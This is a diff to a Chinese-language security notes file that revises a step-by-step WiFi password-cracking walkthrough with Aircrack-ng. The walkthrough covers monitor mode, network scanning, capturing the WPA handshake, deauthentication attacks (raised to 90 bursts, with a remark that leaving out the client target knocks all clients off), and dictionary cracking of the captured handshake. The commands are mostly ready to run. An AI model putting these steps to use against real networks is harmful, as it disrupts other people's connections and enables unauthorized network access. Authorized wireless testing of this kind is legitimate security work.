--- a/网络安全.md
+++ b/网络安全.md
@@ -92,22 +92,25 @@ cvs 2401/tcp
 * [`WiFi网络渗透`密码破解](https://www.cnblogs.com/xiao1234oaix/p/17287409.html)[`Aircrack-ng`](https://www.aircrack-ng.org)
 ~~~bash
 sudo -i   # 用管理员权限
-ifconfig  # 查看当前网卡 Interface = wlan0 || wlan0mon
+ifconfig  # 查看当前网卡 Interface = wlan0 
+iwconfig  # 查看当前模式 Mode:Monitor = wlan0mon 
 airmon-ng              # 检查网卡是否支持监听
+airmon-ng check kill   # 建议先关闭可能会影响的进程
 airmon-ng start wlan0  # 激活无线网卡监听模式 NetworkManager + wpa_supplicant
-airodump-ng wlan0mon   # 扫描周边WiFi信号 + 停止命令Ctrl+C
+airodump-ng wlan0mon   # 扫描附近WiFi +停止命令Ctrl+C -距离PWR值越大越近
 
 # 被动等待抓包命令 # 保持抓包窗口一直开着 + 停止命令Ctrl+C
 airodump-ng --bssid *:*:*:*:*:* --channel 9 --write ./handshake wlan0mon
-   # airodump参数: --bssid “MAC地址”  --channel -c “CH频段”
+   # airodump参数: --bssid “MAC地址”  --channel -c “CH频段信道” --write -w “保存文件名”
    # airodump输出: “bssid无线网卡MAC地址” + “STATION客户端”
 
-# 主动ACK循环攻击 # 等一会儿上面窗口中出现握手包: WPA handshake: ******** # 然后停止抓包
-aireplay-ng -a *:*:*:*:*:* -c *:* -0 10 wlan0mon
-   # aireplay参数: -a “bssid地址” -c “下线STATION客户端” -0 “通知设备断开并攻击10次”
+# 主动ACK循环攻击 # 等待抓包窗口出现[成功]握手包~ WPA handshake: *:*:*:* 然后停止抓包
+aireplay-ng -a *:*:*:*:*:* -c *:* -0 90 wlan0mon
+   # aireplay参数: -a “bssid地址” -c “下线STATION客户端” -0 “通知设备断开攻击次数(一般60~90之间)”
+   # aireplay参数 不指定 -c 目标MAC地址, 就是对AP下面所有终端进行攻击
 
-# 暴力破解密码
-aircrack-ng -b *:*:*:*:*:* -w ./password.txt ./handshake*.cap
+# 破解密码
+aircrack-ng -b *:*:*:*:*:* -w password.txt *.cap
    # aircracky参数: -b “bssid地址” -w “密码字典文件”  “抓包成功的cap文件”
 
 # 停止无线网卡监听模式
